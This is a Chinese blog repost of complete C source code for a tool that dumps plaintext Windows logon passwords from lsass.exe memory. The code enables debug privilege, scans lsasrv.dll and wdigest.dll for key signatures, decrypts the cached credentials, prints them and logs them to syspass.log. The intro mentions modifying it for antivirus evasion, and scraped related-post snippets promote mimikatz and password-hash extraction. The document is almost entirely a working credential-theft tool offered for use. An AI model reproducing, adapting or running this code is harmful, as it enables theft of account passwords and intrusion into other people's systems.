[源码]一键获取windows系统登陆密码vc6版源码

[源码]一键获取windows系统登陆密码vc6版源码
支持:XP/2000/2003/WIN7/2008等

此版本编译出来的程序体积较小几十KB...
而vs版则1点几M,体积整整大了2-30倍
对某些奇葩环境...1点几M可能要分几十次传过去

总是在关键的时候,发现自己以前弄过的东西突然不见了
然后百度好不容易找到了一份..还是发到博客来 收藏
需要修改输出TXT的或免杀啥的...上自己博客找源码

#include <windows.h>
#include <stdio.h>

//
//  Vsbat[0x710dddd]
//  
//  Note: VC++ 6.0编译/Admin权限执行
//

#define MEM_SIZE 0x1000
#define WIN7     0x1
#define WINXP    0x2
#define WIN03    0x4

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} LSA_UNICODE_STRING , *PLSA_UNICODE_STRING ;

typedef struct _SECURITY_LOGON_SESSION_DATA {  
    ULONG Size;  
    LUID LogonId;
    LSA_UNICODE_STRING UserName;  
    LSA_UNICODE_STRING LogonDomain;  
    LSA_UNICODE_STRING AuthenticationPackage;  
    ULONG LogonType;  ULONG Session;  
    PSID Sid;  
    LARGE_INTEGER LogonTime;  
    LSA_UNICODE_STRING LogonServer;  
    LSA_UNICODE_STRING DnsDomainName;  
    LSA_UNICODE_STRING Upn;
} SECURITY_LOGON_SESSION_DATA,  *PSECURITY_LOGON_SESSION_DATA ;

typedef int (__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG) ;
typedef int (__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *) ;
typedef int (__stdcall * pDECRIPTFUNC)(PBYTE, DWORD) ;
typedef int (__stdcall * pLSAFREERETURNBUFFER)(PVOID) ;
typedef int (__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *) ;

int    EnableDebugPrivilege() ;
void   printHexBytes(PBYTE data, int nBytes) ;
PBYTE  search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) ;
void   CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) ;
HANDLE GetProcessHandleByName(const CHAR *szName) ;
LPVOID GetEncryptListHead() ;
void   printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID) ;

// 解密函数特征码(lsasrv.text)
BYTE DecryptfuncSign[] = { 0x8B, 0xFF, 0x55, 0x8B,
                           0xEC, 0x6A, 0x00, 0xFF,
                           0x75, 0x0C, 0xFF, 0x75,
                           0x08, 0xE8 } ;
    
// 密钥KEY相关的关键地址特征码(lsasrv.text)
BYTE DecryptKeySign_WIN7[]  = { 0x33, 0xD2, 0xC7, 0x45, 0xE8, 0x08, 0x00, 0x00, 0x00, 0x89, 0x55, 0xE4 } ;
BYTE DecryptKeySign_XP[]    = { 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x75, 0x10, 0xFF, 0x35 } ;

// 密文关键指针特征码(wdigest.text)
BYTE KeyPointerSign[]  = { 0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04 } ;

// 全局变量
BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200] ;
BYTE Encryptdata[0x100] ;

HANDLE GetProcessHandleByName(const CHAR *szName)
{
    //
    // GetProcessHandle获得lsass.exe进程句柄
    //
    DWORD  dwProcessId , ReturnLength, nBytes ;
    WCHAR  Buffer[MAX_PATH + 0x20] ;
    HANDLE hProcess ;
    PWCHAR pRetStr ;
    pNTQUERYPROCESSINFORMATION NtQueryInformationProcess ;
    CHAR   szCurrentPath[MAX_PATH] ;

NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , \
                                    "NtQueryInformationProcess") ;

// Process ID 一定是 4 的倍数
    for(dwProcessId = 4 ; dwProcessId < 10*1000 ; dwProcessId += 4)
    {
        hProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE, dwProcessId) ;
        if(hProcess != NULL)
        {
            if(!NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength))
            {
                pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4)) ;
                
                nBytes = WideCharToMultiByte(CP_ACP, 0, pRetStr, -1, \
                                    szCurrentPath, MAX_PATH, NULL, NULL) ;
                if(nBytes)
                {
                    PCHAR pCurName = &szCurrentPath[nBytes-1] ;
                    while(pCurName >= szCurrentPath)
                    {
                        if(*pCurName == ‘\\‘)  break ;
                        pCurName -- ;
                    }
                    pCurName ++ ;
                    if(lstrcmpi(szName, pCurName) == 0)
                    {
                        return hProcess ;
                    }
                }
            }
            // 关闭打开的句柄
            CloseHandle(hProcess) ;
        }
    }
    return NULL ;
}

LPVOID GetEncryptListHead()
{
    //
    // 根据KeyPointerSign[]获得密文存储的关键相关地址
    //
    HINSTANCE hMod ;
    LPVOID    pEndAddr, KeyPointer, pTemp ;

hMod = LoadLibrary("wdigest.dll") ;
    pEndAddr = GetProcAddress(hMod, "SpInstanceInit") ;
    pTemp = hMod ;
    KeyPointer = NULL ;
    while(pTemp < pEndAddr && pTemp != NULL)
    {
        KeyPointer = pTemp ;
        pTemp = (LPVOID)search_bytes((PBYTE)pTemp + sizeof(KeyPointerSign), (PBYTE)pEndAddr, \
                KeyPointerSign, sizeof(KeyPointerSign)) ;
    }
    KeyPointer = (LPVOID)(*(DWORD *)((DWORD)KeyPointer - 4)) ;
    FreeLibrary(hMod) ;
    return KeyPointer ;
}

void k8writeTxt(char* logtext)
{

//写入txt
    FILE*  pFile = NULL;
    pFile = fopen( "syspass.log", "a+" );

// 12345/n5678/n 用sizeof 结果竟然只得到 1234
    //fwrite( ptext2,  sizeof(ptext2), 1, pFile );

fwrite( logtext,  strlen(logtext), 1, pFile );

fclose( pFile ); //关闭时会写入结束符
}

int main()
{
    HINSTANCE hModlsasrv ;
    DWORD     LogonSessionCount, i ,dwBytesRead ;
    PLUID     LogonSessionList, pCurLUID , pListLUID ;
    BYTE      EncryptBuf[0x200] ;
    HANDLE    hProcess ;

if(EnableDebugPrivilege() != 1)
        puts("EnableDebugPrivilege fail !") ;

hProcess = GetProcessHandleByName("lsass.exe") ;
    if(hProcess == NULL)
    {
        puts("GetProcessHandleByName fail !") ;
        puts("Try To Run As Administrator ...") ;
        system("echo Press any Key to Continue ... & pause > nul") ;
        return 0 ;
    }

OSVERSIONINFO VersionInformation ;
    DWORD dwVerOff = 0 , osKind = -1 ;

// 版本判断
    memset(&VersionInformation, 0, sizeof(VersionInformation));
    VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation) ;
    GetVersionEx(&VersionInformation) ;
    if (VersionInformation.dwMajorVersion == 5)
    {
      if ( VersionInformation.dwMinorVersion == 1 )
      {
            dwVerOff = 36 ;
            osKind = WINXP ;
      }
      else if (VersionInformation.dwMinorVersion == 2)
      {
            dwVerOff = 28 ;
            osKind = WIN03 ;
      }
    }
    else if (VersionInformation.dwMajorVersion == 6)
    {
        dwVerOff = 32 ;
        osKind = WIN7 ;
    }

if(osKind == -1)
    {
        printf("[Undefined OS version]  Major: %d Minor: %d\n", \
              VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion) ;
        system("echo Press any Key to Continue ... & pause > nul") ;
        CloseHandle(hProcess) ;
        return 0 ;
    }

// 获得解密函数地址
    pDECRIPTFUNC  DecryptFunc ;
    hModlsasrv  = LoadLibrary("lsasrv.dll") ;
    DecryptFunc = (pDECRIPTFUNC)search_bytes((PBYTE)hModlsasrv, (PBYTE)0x7fffdddd, DecryptfuncSign, sizeof(DecryptfuncSign)) ;
          
    // 获得密文链表头地址
    LPVOID  ListHead ;
    ListHead = GetEncryptListHead() ;

// 获得全局数据(lsasrv.data及解密KEY相关的数据)
    CopyKeyGlobalData(hProcess, hModlsasrv, osKind) ;

HINSTANCE                   hModSecur32 ;
    pLSAENUMERATELOGONSESSIONS  LsaEnumerateLogonSessions ;
    pLSAGETLOGONSESSIONDATA     LsaGetLogonSessionData ;
    pLSAFREERETURNBUFFER        LsaFreeReturnBuffer ;

hModSecur32               = LoadLibrary("Secur32.dll") ;
    LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions") ;
    LsaGetLogonSessionData    = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData") ;
    LsaFreeReturnBuffer       = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer") ;

LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList) ;
    for(i = 0 ; i < LogonSessionCount ; i++)
    {
        pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i) ;
        // 打印相关信息
        printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID) ;
        // 遍历链式结构查找当前的LUID
        ReadProcessMemory(hProcess,  ListHead, EncryptBuf, 0x100, &dwBytesRead) ;
        while(*(DWORD *)EncryptBuf != (DWORD)ListHead)
        {
            ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead) ;
            pListLUID = (LUID *)((DWORD)EncryptBuf + 0x10) ;
            if((pListLUID->LowPart  ==  pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart))
            {
                break ;
            }
        }
        if(*(DWORD *)EncryptBuf == (DWORD)ListHead)
        {
            puts("Specific LUID NOT found\n") ;
            continue ;
        }

DWORD   pFinal = 0 ;
        DWORD   nBytes = 0 ;
        LPVOID  pEncrypt   ;
        pFinal   = (DWORD)(pListLUID) + dwVerOff  ;
        nBytes   = *(WORD *)((DWORD)pFinal + 2) ;            // 密文大小
        pEncrypt = (LPVOID)(*(DWORD *)((DWORD)pFinal + 4)) ; // 密文地址(Remote)

memset(Encryptdata, 0, sizeof(Encryptdata)) ;
        ReadProcessMemory(hProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead) ;
 
        // 调用解密函数解密
        DecryptFunc(Encryptdata, nBytes) ;
        // 打印密码明文
        printf("password: %S\n\n", Encryptdata) ;

k8writeTxt((char*)Encryptdata);//保存日志
    }

CloseHandle(hProcess) ;
    LsaFreeReturnBuffer(LogonSessionList) ;

FreeLibrary(hModlsasrv) ;
    FreeLibrary(hModSecur32) ;
    if(osKind == WIN7)
    {
        FreeLibrary(GetModuleHandle("bcrypt.dll")) ;
        FreeLibrary(GetModuleHandle("bcryptprimitives.dll")) ;
    }
   
    system("echo Press any Key to EXIT ... & pause > nul") ;

return 0 ;
}

void printSessionInfo(pLSAGETLOGONSESSIONDATA  LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
{
    PSECURITY_LOGON_SESSION_DATA pLogonSessionData ;

LsaGetLogonSessionData(pCurLUID, &pLogonSessionData) ;
    printf("UserName: %S\n", pLogonSessionData->UserName.Buffer) ;
    printf("LogonDomain: %S\n", pLogonSessionData->LogonDomain.Buffer) ;

LsaFreeReturnBuffer(pLogonSessionData) ;
}

int EnableDebugPrivilege()
{
    HANDLE hToken ;
    LUID   sedebugnameValue ;
    TOKEN_PRIVILEGES tkp ;

if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) )
    {
        puts("OpenProcessToken fail") ;
        return 0 ;
    }
    if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
    {
        puts("LookupPrivilegeValue fail") ;
        return 0 ;
    }

tkp.PrivilegeCount = 1 ;
    tkp.Privileges[0].Luid = sedebugnameValue ;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED ;
    if(!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL) )
    {
        puts("AdjustTokenPrivileges fail") ;
        return 0 ;
    }
    return 1 ;
}

PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
{
    //
    // 在pBegin与pEnd之间搜索pBytes地址处的指定字节序列,字节个数为nsize
    //
    DWORD count ;
    PBYTE pDst ;

while((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd)
    {
        pDst  = pBytes ;
        count = 0 ;
        while(count < nsize && *pBegin == *pDst)
        {
            pBegin ++ ;
            pDst   ++ ;
            count  ++ ;
        }
        if(count == nsize)  break ;
        pBegin = pBegin - count + 1 ;
    }
    if(count == nsize)
    {
        return (PBYTE)((DWORD)pBegin - (DWORD)count) ;
    }
    else
    {
        return NULL ;
    }
}

void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
{
    PIMAGE_SECTION_HEADER pSectionHead ;
    PIMAGE_DOS_HEADER     pDosHead ;
    PIMAGE_NT_HEADERS     pPEHead  ;
    DWORD                 dwBytes, dwBytesRead ;
    LPVOID                pdataAddr, pDecryptKey , DecryptKey, pEndAddr ;
    
    pDosHead     = (PIMAGE_DOS_HEADER)hModlsasrv ;
    pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv \
                   + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER)) ;

pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress  + (DWORD)hModlsasrv) ;
    dwBytes   = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000 ;
    ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead) ;

pPEHead   = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv) ;
    pEndAddr  = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv) ;

switch(osKind)
    {
    case WINXP :
    case WIN03 :
        {
            pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
                            DecryptKeySign_XP, sizeof(DecryptKeySign_XP)) ;

pDecryptKey = (LPVOID)*(DWORD *)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP)) ;
            ReadProcessMemory(hProcess, (LPVOID)pDecryptKey, &DecryptKey, 4, &dwBytesRead) ;
            // DecryptKey 是与解密相关的关键地址
            ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)pDecryptKey ;
            *(DWORD *)pdataAddr = (DWORD)MemBuf ;

break ;
        }
    case WIN7 :
        {
            // WIN7 需调用这两个DLL中的函数进行解密
            LoadLibrary("bcrypt.dll") ;
            LoadLibrary("bcryptprimitives.dll") ;

pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
                            DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7)) ;
            pDecryptKey = (LPVOID)(*(DWORD *)((DWORD)pDecryptKey - 4)) ;
    
            // DecryptKey 是与解密相关的关键地址
            ReadProcessMemory(hProcess,  pDecryptKey, &DecryptKey, 0x4, &dwBytesRead) ;
            
            ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)pDecryptKey ;
            *(DWORD *)pdataAddr = (DWORD)MemBuf ;
    
            ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 8)), SecBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)((DWORD)MemBuf + 8) ;
            *(DWORD *)pdataAddr = (DWORD)SecBuf ;

ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead) ;
            pdataAddr  = (LPVOID)((DWORD)MemBuf + 0xC) ;
            *(DWORD *)pdataAddr = (DWORD)ThirdBuf ;

break ;
        }
    }
    return ;
}

// -- EOF -- //

原文地址:https://www.cnblogs.com/k8gege/p/10261372.html

时间: 2024-10-10 21:36:01

[源码]一键获取windows系统登陆密码vc6版源码的相关文章

这段百度问答,对我相关有对啊!!!----如何获取Windows系统登陆用户名

如何获取Windows系统登陆用户名 http://zhidao.baidu.com/link?url=Hva9PkVwYZv8KSEWftSqTWe8fqM1dhoq59BurnfADmcOvFjFgJUONb2kQ4KrJUF5KjOTXjCf5SQKYNLhcU_dBMzGGBxFxJCRfxCmamIjUji ======================= 一般用 GetUserName(或 GetUserNameEx )函数可得到当前登陆登陆用户名(但不总会得到,下面会分析),此系统函

【转】获取Windows系统明文密码神器

前序 电脑密码忘记了可以用本工具找回,前提是你能进入系统,例如本机保存了远程服务器登录的密码或借别人的电脑,而忘记了密码:mimikatz 2.0工具正好解决了你的问题. 工具下载 binaires : https://github.com/gentilkiwi/mimikatz/releases/latest baiduyun : http://pan.baidu.com/s/1i38m7Fv 以管理员权限运行mimikatz.exe (x86 or x64) mimikatz # privi

用C++的源码一键获取密码,超完整的hack教学!

早期SMB协议在网络上传输明文口令.后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解.微软提出了WindowsNT挑战/响应验证机制,称之为NTLM.现在已经有了更新的NTLMv2以及Kerberos验证体系.Windows加密过的密码口令,我们称之为hash(中文:哈希),Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash.用C++的源码一键获取密码

通过PowerShell获取Windows系统密码Hash

当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大的收获.用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验的管理员查出,不管是早期自己创建进程,进程被干掉就完了,还是注入进程的木马,或者是以服务自启动的木马

windows系统下搭建suse软件源

一.安装ftp组件 依次打开"控制面板"-"程序和功能"-"打开或关闭Windows功能" 把"Internet信息服务"选项中的"FTP服务器"."WEB管理工具"以及"万维网服务"全部选中,这里需要注意打开选项前面的"+"看看里边的子选项有没有勾选,最后选择"确定",等待安装完成. 二.配置ftp服务器 依次打开"

SWT获取windows系统窗口颜色

很多人在使用电脑时都会将系统窗口的颜色修改为护眼色(85.95.205),在设计软件的界面背景时就需要考虑到背景颜色是根据系统的窗口颜色来决定的. 在使用AWT时,可以通过java.awt.SystemColor.window来获取windows系统窗口颜色.使用SWT时,如果使用Display.getSystemColor(id)是无法获得系统窗口颜色的.不过通过Display的getSystemColor方法可以启发我们自己写一个获取系统窗口颜色的方法,以下为代码: int pixel = 

获取Windows系统特殊性目录路径

获取Windows系统特殊性目录路径 uses ShlObj 获取方法: function GetPath(FID: Integer): string;var  pidl: PItemIDList;  path: array[0..MAX_PATH] of Char;begin  SHGetSpecialFolderLocation(0, FID, pidl);  SHGetPathFromIDList(pidl, path);  Result := path;end; 参数可以为下面这些: 1

python 中调用windows系统api操作剪贴版

# -*- coding: utf-8 -*- ''' Created on 2013-11-26 @author: Chengshaoling ''' import win32clipboard as w32 import win32con class OperateClipboard(object): def __init__(self): # print "OperateClipboard" pass def getText(self): w32.OpenClipboard()

Windows系统忘记密码怎么办?如何破解密码?(亲测可用)

国外有一个工具:LazesoftRecoverMyPassword软件,可用于系统密码破解与清除工具,它可以轻松移除 Windows 系统的登录密码,快速破解与清除电脑开机密码,也可以重置密码或者设置为空密码,解锁被锁定或禁用的用户帐户.其原理就是通过创建一个启动盘来破解Windows开机密码. 所需软件: (1)LazesoftRecoverMyPassword软件 (2)UltraISO软件 具体步骤如下: 1.下载并安装LazesoftRecoverMyPassword软件: 2.生成镜像